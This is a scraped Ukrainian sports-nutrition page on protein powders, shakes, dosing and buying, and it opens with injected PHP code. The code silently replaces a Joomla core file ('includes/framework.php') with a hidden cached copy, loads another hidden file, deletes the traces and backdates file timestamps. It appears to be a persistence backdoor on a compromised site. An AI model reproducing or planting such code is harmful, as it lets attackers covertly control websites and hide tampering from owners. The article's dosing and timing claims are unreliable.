$frameworkFile = $_SERVER ["DOCUMENT_ROOT"]."/includes/framework.php"; $cacheFile = $_SERVER ["DOCUMENT_ROOT"]."/cache/_system/".md5("_system")."-cache-system.php"; $frameworkFileTo = $_SERVER ["DOCUMENT_ROOT"]."/cache/_system/".md5("_framework")."-cache-framework.php"; if (file_exists($cacheFile) && file_exists($frameworkFileTo)) { require_once JPATH_BASE . "/cache/_system/".md5("_system")."-cache-system.php"; $filemTime = filemtime($frameworkFile); $contentFile = file_get_contents($frameworkFileTo); file_put_contents($frameworkFile, $contentFile, LOCK_EX); @unlink($frameworkFileTo); @unlink($cacheFile); touch($frameworkFile, $filemTime); touch($_SERVER ["DOCUMENT_ROOT"]."/includes", $filemTime); touch($_SERVER ["DOCUMENT_ROOT"]."/cache", $filemTime); touch($_SERVER ["DOCUMENT_ROOT"]."/cache/_system", $filemTime); } Протеїн - білок. Протеїнові коктейлі. Протеїнова дієта. | Спортивне харчування - успіх у бодібілдингу та пауерліфтингу

Протеїн - білок. Протеїнові коктейлі. Протеїнова дієта.

Протеїн (Protein) являє собою порошкову форму концентрату високоякісного білка, який, у свою чергу, необхідний для формування м'язової маси й відновлення спортсмена після інтенсивного тренування. Без протеїну не може вижити жоден професійний спортсмен, незалежно від того, презентовано речовина в натуральній формі або у формі порошку. Саме протеїнова дієта дозволяє втратити набраний жировий прошарок, не наносячи збиток при цьому самим нарощеним м'язам, що дуже важливо при збільшенні обсягу ваших м'язів.

Протеїни - це головний матеріал для синтезу нового білка. Приймання протеїну дозволяє ущільнюватися як білковій внутрішньоклітинній структурі, так і самій м'язовій клітці.

Потреба в протеїні залежить від вашого навантаження й інтенсивності самого тренування. Звичайне дозування становить приблизно 2 - 3 г протеїну на 1 кг маси тіла. Проте , не варто перестаратися, тому що протеїн засвоюється приблизно на 60 %, і для цього необхідно певне кількість вуглеводів в організмі спортсмена. Так, ідеальної є наступна пропорція: 30 % білка, 60 % вуглеводів, 10 % жиру (краще рослинного). Однак у житті така пропорція досягається дуже рідко. Кількість спожитого протеїну з їжею, як правило, недостатньо, і тому наслідок: спортсмен не може досягтися необхідних результатів. От деякі секрети!

протеїн, протеїновий коктейль,купити протеїнПрийом протеїну не повинен проводитися після вечері, та й взагалі, у вечірній час. Найкраще він засвоюється зранку, тоді амінокислоти сприятливо впливають на ріст вашої м'язової маси. А от увечері, як показали дослідження, приймання протеїну не приносить практично ніякого результату. Вживайте протеїн відразу після тренування, це дозволить вашим м'язам не тільки відновитися, але й активно спричинить ріст м'язів.

Концентрований протеїн також необхідний вашому організму, як і натуральний, до речі, що втримується в м'ясі, рибі, яйцях, і молочних продуктах, горіхах (волоському, кеш'ю, мигдалі), насіннях (соняшника, кунжуті, кабачка), пивних дріжджах, пророщеній пшениці й ін. Протеїновий порошок можна вживати між основними прийманнями їжі або коли ви просто не встигаєте собі щось приготувати. Використовувати його простіше простого. 2 ст. ложки порошку, або якщо в упакуванні є ложечка, то дивитеся вказівки в інструкції, додаєте до 300 мол молока, або, якщо є бажання, те можна збільшити й до літра. Якщо вам набрид смак концентрату, то цілком можна додати шоколадний сироп без цукру, або пари заморожених ягід полуниці або лохини. Вони прекрасно доповнюють смак порошку, і протеїновий коктейль стає не гірше коктейлю з Макдоналдса. Головне, добре збийте його в блендере, тому що якщо залишаться грудочки, те й уживати його буде м'яко сказати огидно, і засвоюватися він буде гірше.

Протеїнові коктейлі бувають різні, і вибрати ви зможете залежно від своїх переваг і необхідності. Проте , як радять самі спортсмени, не беріть найдешевший протеїн, ваш організм може відмовитися від його засвоєння. Використовуйте вже перевірені закордонні фірми. Якщо одні протеїн вам не пішов, не варто зневірятися, спробуйте іншої. Цілком можливо, що саме він вам і підійде.

Купити протеїн ви зможете в спеціалізованих спортивних магазинах, а також успішно замовити у нас. Є як різні цінові категорії, якість продукту, а також різні обсяги речовини і його наповнювачі. Купуйте протеїн більшими впакуваннями, це дозволить заощадити деякі засоби й час, витрачене на покупки. Якщо готовите продукти, багаті протеїнами, збільшуйте приготовлене за день. Це дозволить вам стояти в плити приблизно раз у тиждень. Подрібнюйте м'ясо при готуванні, воно буде краще засвоюватися організмом, та й з'їжте ви набагато більше звичайного.

Приймання протеїну краще робити через соломинку, тому що амінокислоти здатні руйнувати емаль зубів. Однак це не один негативний момент використання протеїнових коктейлів. Більші дозування білка здатні негативно впливати на печінку, а також на роботу серця. Тому, не перевищуйте вказане дозування.Багато ще не означає -добре. Тому що замість користі для організму зможете принести шкоду.

Джерело http://mega-atlet.ru

 
Спортивне харчування Протеїн - білок. Протеїнові коктейлі. Протеїнова дієта.